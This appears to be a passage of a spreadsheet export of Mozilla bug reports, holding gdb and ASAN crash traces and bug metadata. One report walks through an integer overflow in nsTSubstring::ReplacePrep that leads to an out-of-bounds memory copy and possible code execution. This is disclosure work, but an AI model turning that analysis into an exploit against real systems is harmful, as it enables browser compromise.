#2  0xb71a7a01 in abort () from /lib/tls/i686/cmov/libc.so.6
#3  0xb719f10e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6
#4  0xb6da3e79 in gtk_xtbin_new (parent_window=0x0, f=0x0) at mozilla-central/widget/src/gtkxtbin/gtk2xtbin.c:316
#5  0xb4f16590 in nsPluginNativeWindowGtk2::CreateXtWindow (this=0xa73eaba0) at mozilla-central/modules/plugin/base/src/nsPluginNativeWindowGtk2.cpp:408
#6  0xb4f169d4 in nsPluginNativeWindowGtk2::CallSetWindow (this=0xa73eaba0, aPluginInstance=@0xbfa0caf8) at mozilla-central/modules/plugin/base/src/nsPluginNativeWindowGtk2.cpp:222
#7  0xb52f7e73 in nsObjectFrame::CallSetWindow (this=0xa98663a0) at mozilla-central/layout/generic/nsObjectFrame.cpp:989
#8  0xb52f835a in nsObjectFrame::DidReflow (this=0xa98663a0, aPresContext=0xa968b800, aReflowState=0xbfa0cba0, aStatus=1) at mozilla-central/layout/generic/nsObjectFrame.cpp:1094
#9  0xb52ec3ad in nsLineLayout::ReflowFrame (this=0xbfa0ceb4, aFrame=0xa98663a0, aReflowStatus=@0xbfa0cdbc, aMetrics=0x0, aPushedFrame=@0xbfa0cdb8)
    at mozilla-central/layout/generic/nsLineLayout.cpp:990
#10 0xb527db44 in nsBlockFrame::ReflowInlineFrame (this=0xa98662ec, aState=@0xbfa0d2b4, aLineLayout=@0xbfa0ceb4, aLine={mCurrent = 0xa98663e8, mListLink = 0xa986632c}, aFrame=0xa98663a0, 
    aLineReflowStatus=0xbfa0ce68) at mozilla-central/layout/generic/nsBlockFrame.cpp:3594
#11 0xb5283d72 in nsBlockFrame::DoReflowInlineFrames (this=0xa98662ec, aState=@0xbfa0d2b4, aLineLayout=@0xbfa0ceb4, aLine={mCurrent = 0xa98663e8, mListLink = 0xa986632c}, aKeepReflowGoing=0xbfa0d228, 
    aLineReflowStatus=0xbfa0cf78, aAllowPullUp=1) at mozilla-central/layout/generic/nsBlockFrame.cpp:3415
#12 0xb52845ad in nsBlockFrame::ReflowInlineFrames (this=0xa98662ec, aState=@0xbfa0d2b4, aLine={mCurrent = 0xa98663e8, mListLink = 0xa986632c}, aKeepReflowGoing=0xbfa0d228)
    at mozilla-central/layout/generic/nsBlockFrame.cpp:3262
#13 0xb5284b45 in nsBlockFrame::ReflowLine (this=0xa98662ec, aState=@0xbfa0d2b4, aLine={mCurrent = 0xa98663e8, mListLink = 0xa986632c}, aKeepReflowGoing=0xbfa0d228)
    at mozilla-central/layout/generic/nsBlockFrame.cpp:2317
#14 0xb5285393 in nsBlockFrame::ReflowDirtyLines (this=0xa98662ec, aState=@0xbfa0d2b4) at mozilla-central/layout/generic/nsBlockFrame.cpp:1897
#15 0xb52867d3 in nsBlockFrame::Reflow (this=0xa98662ec, aPresContext=0xa968b800, aMetrics=@0xbfa0d85c, aReflowState=@0xbfa0d6e8, aStatus=@0xbfa0d9ac)
    at mozilla-central/layout/generic/nsBlockFrame.cpp:944
#16 0xb528a5a9 in nsBlockReflowContext::ReflowBlock (this=0xbfa0d838, aSpace=@0xbfa0d8d0, aApplyTopMargin=1, aPrevMargin=@0xbfa0ddbc, aClearance=0, aIsAdjacentWithTop=1, aLine=0xa9866410, aFrameRS=@0xbfa0d6e8, 
    aFrameReflowStatus=@0xbfa0d9ac, aState=@0xbfa0dd34) at mozilla-central/layout/generic/nsBlockReflowContext.cpp:310
#17 0xb528255f in nsBlockFrame::ReflowBlockFrame (this=0xa98660c8, aState=@0xbfa0dd34, aLine={mCurrent = 0xa9866410, mListLink = 0xa9866108}, aKeepReflowGoing=0xbfa0dca8)
    at mozilla-central/layout/generic/nsBlockFrame.cpp:2990
#18 0xb528488d in nsBlockFrame::ReflowLine (this=0xa98660c8, aState=@0xbfa0dd34, aLine={mCurrent = 0xa9866410, mListLink = 0xa9866108}, aKeepReflowGoing=0xbfa0dca8)
    at mozilla-central/layout/generic/nsBlockFrame.cpp:2262
#19 0xb5285393 in nsBlockFrame::ReflowDirtyLines (this=0xa98660c8, aState=@0xbfa0dd34) at mozilla-central/layout/generic/nsBlockFrame.cpp:1897
#20 0xb52867d3 in nsBlockFrame::Reflow (this=0xa98660c8, aPresContext=0xa968b800, aMetrics=@0xbfa0e204, aReflowState=@0xbfa0e15c, aStatus=@0xbfa0e468)
    at mozilla-central/layout/generic/nsBlockFrame.cpp:944
#21 0xb5297c79 in nsContainerFrame::ReflowChild (this=0xa9cfaa90, aKidFrame=0xa98660c8, aPresContext=0xa968b800, aDesiredSize=@0xbfa0e204, aReflowState=@0xbfa0e15c, aX=0, aY=0, aFlags=0, aStatus=@0xbfa0e468, 
    aTracker=0x0) at mozilla-central/layout/generic/nsContainerFrame.cpp:821
#22 0xb52cedd8 in CanvasFrame::Reflow (this=0xa9cfaa90, aPresContext=0xa968b800, aDesiredSize=@0xbfa0e4c8, aReflowState=@0xbfa0e39c, aStatus=@0xbfa0e468)
    at mozilla-central/layout/generic/nsHTMLFrame.cpp:656
#23 0xb5297c79 in nsContainerFrame::ReflowChild (this=0xa9844010, aKidFrame=0xa9cfaa90, aPresContext=0xa968b800, aDesiredSize=@0xbfa0e4c8, aReflowState=@0xbfa0e39c, aX=0, aY=0, aFlags=3, aStatus=@0xbfa0e468, 
---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---q
aTrackQuit
(gdb) up
#1  0xb71a6085 in raise () from /lib/tls/i686/cmov/libc.so.6
(gdb) 
#2  0xb71a7a01 in abort () from /lib/tls/i686/cmov/libc.so.6
(gdb) 
#3  0xb719f10e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6
(gdb) 
#4  0xb6da3e79 in gtk_xtbin_new (parent_window=0x0, f=0x0) at mozilla-central/widget/src/gtkxtbin/gtk2xtbin.c:316
316	  assert(parent_window != NULL);
Current language:  auto; currently c
(gdb) p parent_window
$37 = (GdkWindow *) 0x0
(gdb) up
#5  0xb4f16590 in nsPluginNativeWindowGtk2::CreateXtWindow (this=0xa73eaba0) at mozilla-central/modules/plugin/base/src/nsPluginNativeWindowGtk2.cpp:408
408	  mSocketWidget = gtk_xtbin_new(gdkWindow, 0);
Current language:  auto; currently c++
(gdb) 
#6  0xb4f169d4 in nsPluginNativeWindowGtk2::CallSetWindow (this=0xa73eaba0, aPluginInstance=@0xbfa0caf8) at mozilla-central/modules/plugin/base/src/nsPluginNativeWindowGtk2.cpp:222
222	          CreateXtWindow();
(gdb) 
#7  0xb52f7e73 in nsObjectFrame::CallSetWindow (this=0xa98663a0) at mozilla-central/layout/generic/nsObjectFrame.cpp:989
989	  window-&gt;CallSetWindow(pi);
(gdb)
For reference, the instantiate path is something like this:
#0  0xb2afb67c in nsObjectFrame::InstantiatePlugin (this=0xac3603a0, aPluginHost=0xb0ecf944, aMimeType=0xa9bfbd38 "application/x-test", aURI=0xac247180)
    at mozilla-central/layout/generic/nsObjectFrame.cpp:896
(More stack frames follow...)
(gdb) bt
#0  0xb2afb67c in nsObjectFrame::InstantiatePlugin (this=0xac3603a0, aPluginHost=0xb0ecf944, aMimeType=0xa9bfbd38 "application/x-test", aURI=0xac247180)
    at mozilla-central/layout/generic/nsObjectFrame.cpp:896
#1  0xb2b020e5 in nsObjectFrame::Instantiate (this=0xac3603a0, aMimeType=0xa9bfbd38 "application/x-test", aURI=0xac247180) at mozilla-central/layout/generic/nsObjectFrame.cpp:1808
#2  0xb2eadce3 in nsPluginStreamListener::SetupPlugin (this=0xa9bdba80) at mozilla-central/content/html/document/src/nsPluginDocument.cpp:192
#3  0xb2eadd77 in nsPluginStreamListener::OnStartRequest (this=0xa9bdba80, request=0xa9b5f220, ctxt=0x0) at mozilla-central/content/html/document/src/nsPluginDocument.cpp:114
#4  0xb2886752 in nsDocumentOpenInfo::OnStartRequest (this=0xa9bfbd90, request=0xa9b5f220, aCtxt=0x0) at mozilla-central/uriloader/base/nsURILoader.cpp:290
#5  0xb5f93c7d in nsBaseChannel::OnStartRequest (this=0xa9b5f1f0, request=0xac3a90a0, ctxt=0x0) at mozilla-central/netwerk/base/src/nsBaseChannel.cpp:665
#6  0xb5fa7517 in nsInputStreamPump::OnStateStart (this=0xac3a90a0) at mozilla-central/netwerk/base/src/nsInputStreamPump.cpp:439
#7  0xb5fa82eb in nsInputStreamPump::OnInputStreamReady (this=0xac3a90a0, stream=0xac34d34c) at mozilla-central/netwerk/base/src/nsInputStreamPump.cpp:395
#8  0xb7c3054a in nsInputStreamReadyEvent::Run (this=0xa9bdb5e0) at mozilla-central/xpcom/io/nsStreamUtils.cpp:111
#9  0xb7c5f533 in nsThread::ProcessNextEvent (this=0xb6b7b830, mayWait=1, result=0xbf9589d0) at mozilla-central/xpcom/threads/nsThread.cpp:510
#10 0xb7bea779 in NS_ProcessNextEvent_P (thread=0xb6b7b830, mayWait=1) at nsThreadUtils.cpp:230
#11 0xb4ed0992 in nsBaseAppShell::Run (this=0xb6a551f0) at mozilla-central/widget/src/xpwidgets/nsBaseAppShell.cpp:170
#12 0xb4c3bce1 in nsAppStartup::Run (this=0xb6aa0790) at mozilla-central/toolkit/components/startup/src/nsAppStartup.cpp:192
#13 0xb7eb9860 in XRE_main (argc=1, argv=0xbf958ff4, aAppData=0xb6b0e380) at mozilla-central/toolkit/xre/nsAppRunner.cpp:3232
#14 0x080499f2 in main (argc=1, argv=0xbf958ff4) at mozilla-central/browser/app/nsBrowserApp.cpp:156
(gdb)
(they're from different sessions)</t>
        </is>
      </c>
      <c r="X1739" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1740">
      <c r="A1740" t="n">
        <v>1535886</v>
      </c>
      <c r="B1740" t="inlineStr">
        <is>
          <t>2019-03-16 21:26:03 -0700</t>
        </is>
      </c>
      <c r="C1740" t="inlineStr">
        <is>
          <t>[Automated review] Automated MOZ_CAN_RUN_SCRIPT review is doing something weird</t>
        </is>
      </c>
      <c r="D1740" t="inlineStr">
        <is>
          <t>2022-08-17 14:01:35 -0700</t>
        </is>
      </c>
      <c r="E1740" t="n">
        <v>1</v>
      </c>
      <c r="F1740" t="n">
        <v>1</v>
      </c>
      <c r="G1740" t="n">
        <v>7</v>
      </c>
      <c r="H1740" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1740" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J1740" t="inlineStr">
        <is>
          <t>Source Code Analysis</t>
        </is>
      </c>
      <c r="K1740" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1740" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1740" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1740" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1740" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1740" t="inlineStr"/>
      <c r="Q1740" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1740" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1740" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1740" t="n">
        <v>1</v>
      </c>
      <c r="U1740" t="n">
        <v>0</v>
      </c>
      <c r="V1740" t="n">
        <v>4</v>
      </c>
      <c r="W1740" t="inlineStr">
        <is>
          <t>I posted a patch that adds some MOZ_CAN_RUN_SCRIPT annotations.  The patch passes static analysis locally and on try, but I get clang-tidy moz-can-run-script comments in phabricator like https://phabricator.services.mozilla.com/D23776#inline-137769
I got a bunch of these, actually, on different patches:
https://phabricator.services.mozilla.com/D23775#inline-137767
https://phabricator.services.mozilla.com/D23776#inline-137784
https://phabricator.services.mozilla.com/D23771#inline-137797
https://phabricator.services.mozilla.com/D23771#inline-137796
https://phabricator.services.mozilla.com/D23771#inline-137795
https://phabricator.services.mozilla.com/D23771#inline-137798
All seem to do with dereferencing pointer arguments...</t>
        </is>
      </c>
      <c r="X1740" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1741">
      <c r="A1741" t="n">
        <v>503144</v>
      </c>
      <c r="B1741" t="inlineStr">
        <is>
          <t>2009-07-08 12:09:57 -0700</t>
        </is>
      </c>
      <c r="C1741" t="inlineStr">
        <is>
          <t>Crash in [@ js3250.dll@0x68bec] [@ specializeTreesToMissingGlobals(JSContext*, TreeInfo*) ] visiting certain pages</t>
        </is>
      </c>
      <c r="D1741" t="inlineStr">
        <is>
          <t>2013-03-11 11:22:28 -0700</t>
        </is>
      </c>
      <c r="E1741" t="n">
        <v>1</v>
      </c>
      <c r="F1741" t="n">
        <v>1</v>
      </c>
      <c r="G1741" t="n">
        <v>3</v>
      </c>
      <c r="H1741" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1741" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1741" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1741" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L1741" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1741" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1741" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1741" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1741" t="inlineStr">
        <is>
          <t>[sg:critical?] keep bug closed until bug 507901 is fixed</t>
        </is>
      </c>
      <c r="Q1741" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1741" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1741" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1741" t="n">
        <v>1</v>
      </c>
      <c r="U1741" t="n">
        <v>0</v>
      </c>
      <c r="V1741" t="n">
        <v>78</v>
      </c>
      <c r="W1741" t="inlineStr">
        <is>
          <t>As per https://support.mozilla.com/tiki-view_forum_thread.php?forumId=1&amp;comments_parentId=384001#threadId386915 some users are having problems visiting websites or uploading data to webservers. 
A crash report associated with this issue can be found here:
http://crash-stats.mozilla.com/report/index/65f3ab41-5960-4cb6-a270-cbaee2090708?p=1
As you can see in the forum post, there are two users experiencing the same problem. I could reproduce it with 
Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Steps to reproduce:
1. Go to http://www.solarlog-home.de/rosenhammer/visu.html 
2. Randomly navigate to the site. It didn't crash the first time for me but did after I clicked somewhere.</t>
        </is>
      </c>
      <c r="X1741" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1742">
      <c r="A1742" t="n">
        <v>1306883</v>
      </c>
      <c r="B1742" t="inlineStr">
        <is>
          <t>2016-10-01 10:52:25 -0700</t>
        </is>
      </c>
      <c r="C1742" t="inlineStr">
        <is>
          <t>SEGV in sk_memset32 from SkLinearGradient::LinearGradientContext::shade4_dx_clamp</t>
        </is>
      </c>
      <c r="D1742" t="inlineStr">
        <is>
          <t>2024-05-30 09:22:08 -0700</t>
        </is>
      </c>
      <c r="E1742" t="n">
        <v>1</v>
      </c>
      <c r="F1742" t="n">
        <v>1</v>
      </c>
      <c r="G1742" t="n">
        <v>3</v>
      </c>
      <c r="H1742" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1742" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1742" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K1742" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L1742" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1742" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1742" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1742" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1742" t="inlineStr">
        <is>
          <t>[gfx-noted][post-critsmash-triage][adv-main51+]</t>
        </is>
      </c>
      <c r="Q1742" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1742" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1742" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T1742" t="n">
        <v>1</v>
      </c>
      <c r="U1742" t="n">
        <v>0</v>
      </c>
      <c r="V1742" t="n">
        <v>30</v>
      </c>
      <c r="W1742" t="inlineStr">
        <is>
          <t>Created attachment 8796860
firefox-SEGV-6f9-6f9-6f9-6f4-1ba0-min.html
Tested on:
OS: Ubuntu 16.04.1 LTS
Firefox: ASAN-build moz_source_stamp: f713114b8c8d352b668b3e8052bc51ece4df34e0
prefs.js from https://github.com/MozillaSecurity/fuzzdata/blob/master/settings/firefox/prefs.js
ASAN-trace:
$./firefox firefox-SEGV-6f9-6f9-6f9-6f4-1ba0-min.html 
ATTENTION: default value of option force_s3tc_enable overridden by environment.
ATTENTION: default value of option force_s3tc_enable overridden by environment.
ASAN:DEADLYSIGNAL
=================================================================
==30297==ERROR: AddressSanitizer: SEGV on unknown address 0x7f07ea7d9628 (pc 0x7f0a1fac92aa bp 0x7fff76db3950 sp 0x7fff76db38c0 T0)
    #0 0x7f0a1fac92a9 in sk_memset32 /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkUtils.h:31:19
    #1 0x7f0a1fac92a9 in fill&lt;false&gt; /home/worker/workspace/build/src/gfx/skia/skia/src/effects/gradients/SkLinearGradient.cpp:538
    #2 0x7f0a1fac92a9 in void SkLinearGradient::LinearGradientContext::shade4_dx_clamp&lt;false, false&gt;(unsigned int*, int, float, float, float, float const*) /home/worker/workspace/build/src/gfx/skia/skia/src/effects/gradients/SkLinearGradient.cpp:651
    #3 0x7f0a1fabc2a4 in SkLinearGradient::LinearGradientContext::shade4_clamp(int, int, unsigned int*, int) /home/worker/workspace/build/src/gfx/skia/skia/src/effects/gradients/SkLinearGradient.cpp:750:13
    #4 0x7f0a1fabbd6a in SkLinearGradient::LinearGradientContext::shadeSpan(int, int, unsigned int*, int) /home/worker/workspace/build/src/gfx/skia/skia/src/effects/gradients/SkLinearGradient.cpp:280:9
    #5 0x7f0a1f8152d4 in SkARGB32_Shader_Blitter::blitRect(int, int, int, int) /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkBlitter_ARGB32.cpp:435:17
    #6 0x7f0a1f86643f in antifilldot8(int, int, int, int, SkBlitter*, bool) /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkScan_Antihair.cpp:678:17
    #7 0x7f0a1f864c44 in antifillrect /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkScan_Antihair.cpp:692:5
    #8 0x7f0a1f864c44 in antifillrect /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkScan_Antihair.cpp:765
    #9 0x7f0a1f864c44 in SkScan::AntiFillRect(SkRect const&amp;, SkRegion const*, SkBlitter*) /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkScan_Antihair.cpp:788
    #10 0x7f0a1f86508f in SkScan::AntiFillRect(SkRect const&amp;, SkRasterClip const&amp;, SkBlitter*) /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkScan_Antihair.cpp:807:9
    #11 0x7f0a1fd03658 in SkDraw::drawRect(SkRect const&amp;, SkPaint const&amp;, SkMatrix const*, SkRect const*) const /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.cpp:877:21
    #12 0x7f0a1fa48072 in SkCanvas::onDrawRect(SkRect const&amp;, SkPaint const&amp;) /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkCanvas.cpp:2109:9
    #13 0x7f0a18029068 in mozilla::gfx::DrawTargetSkia::FillRect(mozilla::gfx::RectTyped&lt;mozilla::gfx::UnknownUnits, float&gt; const&amp;, mozilla::gfx::Pattern const&amp;, mozilla::gfx::DrawOptions const&amp;) /home/worker/workspace/build/src/gfx/2d/DrawTargetSkia.cpp:668:3
    #14 0x7f0a186a3a4e in gfxContext::FillAzure(mozilla::gfx::Pattern const&amp;, float) /home/worker/workspace/build/src/gfx/thebes/gfxContext.cpp:1069:5
    #15 0x7f0a186a3428 in gfxContext::Fill(mozilla::gfx::Pattern const&amp;) /home/worker/workspace/build/src/gfx/thebes/gfxContext.cpp:200:3
    #16 0x7f0a18698ab3 in gfxContext::Fill() /home/worker/workspace/build/src/gfx/thebes/gfxContext.cpp:192:3
    #17 0x7f0a1d1514d5 in nsCSSRendering::PaintGradient(nsPresContext*, nsRenderingContext&amp;, nsStyleGradient*, nsRect const&amp;, nsRect const&amp;, nsRect const&amp;, nsSize const&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::CSSPixel&gt; const&amp;, nsSize const&amp;) /home/worker/workspace/build/src/layout/base/nsCSSRendering.cpp:3026:7
    #18 0x7f0a1d167c3b in nsImageRenderer::Draw(nsPresContext*, nsRenderingContext&amp;, nsRect const&amp;, nsRect const&amp;, nsRect const&amp;, nsPoint const&amp;, nsSize const&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::CSSPixel&gt; const&amp;) /home/worker/workspace/build/src/layout/base/nsCSSRendering.cpp:5472:7
    #19 0x7f0a1d145f7a in DrawBackground /home/worker/workspace/build/src/layout/base/nsCSSRendering.cpp:5574:10
.
.
.
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkUtils.h:31:19 in sk_memset32
==30297==ABORTING</t>
        </is>
      </c>
      <c r="X1742" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1743">
      <c r="A1743" t="n">
        <v>1171603</v>
      </c>
      <c r="B1743" t="inlineStr">
        <is>
          <t>2015-06-04 11:33:22 -0700</t>
        </is>
      </c>
      <c r="C1743" t="inlineStr">
        <is>
          <t>Overflow nsTSubstring::ReplacePrep causes memory-safety bugs in string library</t>
        </is>
      </c>
      <c r="D1743" t="inlineStr">
        <is>
          <t>2024-05-30 09:01:58 -0700</t>
        </is>
      </c>
      <c r="E1743" t="n">
        <v>1</v>
      </c>
      <c r="F1743" t="n">
        <v>1</v>
      </c>
      <c r="G1743" t="n">
        <v>3</v>
      </c>
      <c r="H1743" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1743" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1743" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K1743" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L1743" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1743" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1743" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1743" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1743" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main40+]</t>
        </is>
      </c>
      <c r="Q1743" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1743" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1743" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T1743" t="n">
        <v>1</v>
      </c>
      <c r="U1743" t="n">
        <v>0</v>
      </c>
      <c r="V1743" t="n">
        <v>26</v>
      </c>
      <c r="W1743" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
Build ID: 20150305021524
Steps to reproduce:
nsTSubstring::ReplacePrep (C:\docs\dev\firefox\source\38.0.1\xpcom\string\nsTSubstring.h) can cause memory to be written that the destination string object does not own. This bug could permit an attacker to write portions of Firefox's address space, potentially allowing her to execute code of her choice.
The bug is in line 1003:
 998:  NS_WARN_UNUSED_RESULT bool ReplacePrep(index_type aCutStart,
 999:                                         size_type aCutLength,
1000:                                         size_type aNewLength)
1001:  {
1002:    aCutLength = XPCOM_MIN(aCutLength, mLength - aCutStart);
1003:    uint32_t newTotalLen = mLength - aCutLength + aNewLength;
1004:    if (aCutStart == mLength &amp;&amp; Capacity() &gt; newTotalLen) {
1005:      mFlags &amp;= ~F_VOIDED;
1006:      mData[newTotalLen] = char_type(0);
1007:      mLength = newTotalLen;
1008:      return true;
1009:    }
1010:    return ReplacePrepInternal(aCutStart, aCutLength, aNewLength, newTotalLen);
1011:  }
If aCutStart &gt; mLength, aCutLength becomes a very large uint32_t. The same thing happens if aCutLength is very large, or if aNewLength is very large. In all of these cases, newTotalLen can overflow, resulting in a call to ReplacePrepInternal with a too-small newTotalLen.
The simplest case is where aNewLength is very large.
Using aNewLength == 0xfffffffe and mLength == 10 for the existing string, imagine a call to Append (&amp;s, 0xfffffffe). (The same kind of thing works on AppendASCII, etc.). Append lives at nsTSubstring.h line 531:
531:  void Append(const char_type* aData, size_type aLength = size_type(-1))
532:  {
533:    Replace(mLength, 0, aData, aLength);
534:  }
The call to Replace resolves to the function at nsTSubstring.cpp line 502 with arguments (10, 0, &amp;s, 0xfffffffe):
502: void
503: nsTSubstring_CharT::Replace(index_type aCutStart, size_type aCutLength,
504:                             const char_type* aData, size_type aLength)
505: {
506:   if (!Replace(aCutStart, aCutLength, aData, aLength,
507:                mozilla::fallible)) {
508:     AllocFailed(Length() - aCutLength + 1);
509:   }
510: }
which then chains to the function at nsTSubstring.cpp line 512 with arguments (10, 0, &amp;s, 0xfffffffe, mozilla::fallible)):
512: bool
513: nsTSubstring_CharT::Replace(index_type aCutStart, size_type aCutLength,
514:                             const char_type* aData, size_type aLength,
515:                             const fallible_t&amp; aFallible)
516: {
517:   // unfortunately, some callers pass null :-(
518:   if (!aData) {
519:     aLength = 0;
520:   } else {
521:     if (aLength == size_type(-1)) {
522:       aLength = char_traits::length(aData);
523:     }
524: 
525:     if (IsDependentOn(aData, aData + aLength)) {
526:       nsTAutoString_CharT temp(aData, aLength);
527:       return Replace(aCutStart, aCutLength, temp, aFallible);
528:     }
529:   }
530: 
531:   aCutStart = XPCOM_MIN(aCutStart, Length());
532: 
533:   bool ok = ReplacePrep(aCutStart, aCutLength, aLength);
534:   if (!ok) {
535:     return false;
536:   }
537: 
538:   if (aLength &gt; 0) {
539:     char_traits::copy(mData + aCutStart, aData, aLength);
540:   }
541: 
542:   return true;
543: }
Control passes to line 525, which returns false because aData does not overlap mData. Line 531 then computes 10 for aCutStart, so line 533 calls ReplacePrep (10, 0, 0xfffffffe). That function:
 998:  NS_WARN_UNUSED_RESULT bool ReplacePrep(index_type aCutStart,
 999:                                         size_type aCutLength,
1000:                                         size_type aNewLength)
1001:  {
1002:    aCutLength = XPCOM_MIN(aCutLength, mLength - aCutStart);
1003:    uint32_t newTotalLen = mLength - aCutLength + aNewLength;
1004:    if (aCutStart == mLength &amp;&amp; Capacity() &gt; newTotalLen) {
1005:      mFlags &amp;= ~F_VOIDED;
1006:      mData[newTotalLen] = char_type(0);
1007:      mLength = newTotalLen;
1008:      return true;
1009:    }
1010:    return ReplacePrepInternal(aCutStart, aCutLength, aNewLength, newTotalLen);
1011:  }
computes aCutLength == 0 on line 1002, and newTotalLen == 10 - 0 + 0xfffffffe == 8 on line 1003. The test on line 1004 passes, line 1006 spuriously writes a 0 to mData [8], and control returns to the caller (nsTSubstring_CharT::Replace) at line 534. Control then eventually passes to line 539:
539:     char_traits::copy(mData + aCutStart, aData, aLength);
which copies 0xfffffffe bytes from aData into the unallocated region beginning at mData + 10.</t>
        </is>
      </c>
      <c r="X1743" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1744">
      <c r="A1744" t="n">
        <v>395609</v>
      </c>
      <c r="B1744" t="inlineStr">
        <is>
          <t>2007-09-09 16:51:27 -0700</t>
        </is>
      </c>
      <c r="C1744" t="inlineStr">
        <is>
          <t>Crash [@ nsHTMLReflowState::GetNearestContainingBlock] with absolute positioning and overflow event doing stuff</t>
        </is>
      </c>
      <c r="D1744" t="inlineStr">
        <is>
          <t>2013-04-17 13:26:08 -0700</t>
        </is>
      </c>
      <c r="E1744" t="n">
        <v>1</v>
      </c>
      <c r="F1744" t="n">
        <v>1</v>
      </c>
      <c r="G1744" t="n">
        <v>3</v>
      </c>
      <c r="H1744" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1744" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1744" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1744" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1744" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1744" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1744" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1744" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1744" t="inlineStr">
        <is>
          <t>[dbaron-1.9:Rs][depends on 402982] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q1744" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1744" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1744" t="inlineStr">
        <is>
          <t>mozilla1.9beta5</t>
        </is>
      </c>
